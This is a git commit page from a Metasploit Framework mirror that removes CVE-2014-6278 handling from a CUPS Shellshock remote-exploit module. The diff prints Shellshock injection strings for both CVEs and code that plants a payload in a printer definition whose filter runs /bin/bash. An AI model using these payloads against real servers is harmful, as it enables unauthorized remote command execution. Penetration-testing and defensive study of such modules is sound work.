infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Remove CVE-2014-6278

bug/bundler_fix
Brendan Coles 2014-10-28 16:18:24 +00:00
parent a060fec760
commit 78b199fe72
1 changed files with 1 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/multi/http/cups_bash_env_exec.rb
View File

@ -19,7 +19,6 @@ class Metasploit4 < Msf::Exploit::Remote
}, },
'Author' => [ 'Author' => [
'Stephane Chazelas', # Vulnerability discovery 'Stephane Chazelas', # Vulnerability discovery
'lcamtuf', # CVE-2014-6278
'Brendan Coles <bcoles[at]gmail.com>' # msf 'Brendan Coles <bcoles[at]gmail.com>' # msf
], ],
'References' => [ 'References' => [
@ -54,7 +53,6 @@ class Metasploit4 < Msf::Exploit::Remote
OptBool.new('SSL', [ true, 'Use SSL', true ]), OptBool.new('SSL', [ true, 'Use SSL', true ]),
OptString.new('USERNAME', [ true, 'CUPS username', 'root']), OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
OptString.new('PASSWORD', [ true, 'CUPS user password', '']), OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ]) OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
], self.class) ], self.class)
end end
@ -66,13 +64,6 @@ class Metasploit4 < Msf::Exploit::Remote
%{() { :;}; $(#{cmd}) & } %{() { :;}; $(#{cmd}) & }
end end
#
# CVE-2014-6278
#
def cve_2014_6278(cmd)
%{() { _; } >_[$($())] { $(#{cmd}) & }}
end
# #
# Check credentials # Check credentials
# #
@ -107,17 +98,9 @@ class Metasploit4 < Msf::Exploit::Remote
@cookie = rand_text_alphanumeric(16) @cookie = rand_text_alphanumeric(16)
printer_name = rand_text_alphanumeric(10 + rand(5)) printer_name = rand_text_alphanumeric(10 + rand(5))
# Select target CVE
case datastore['CVE']
when 'CVE-2014-6278'
cmd = cve_2014_6278(payload.raw)
else
cmd = cve_2014_6271(payload.raw)
end
# Add a printer containing the payload # Add a printer containing the payload
# with a CUPS filter pointing to /bin/bash # with a CUPS filter pointing to /bin/bash
res = add_printer(printer_name, cmd) res = add_printer(printer_name, cve_2014_6271(payload.raw))
if !res if !res
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
elsif res.body =~ /Set Default Options for #{printer_name}/ elsif res.body =~ /Set Default Options for #{printer_name}/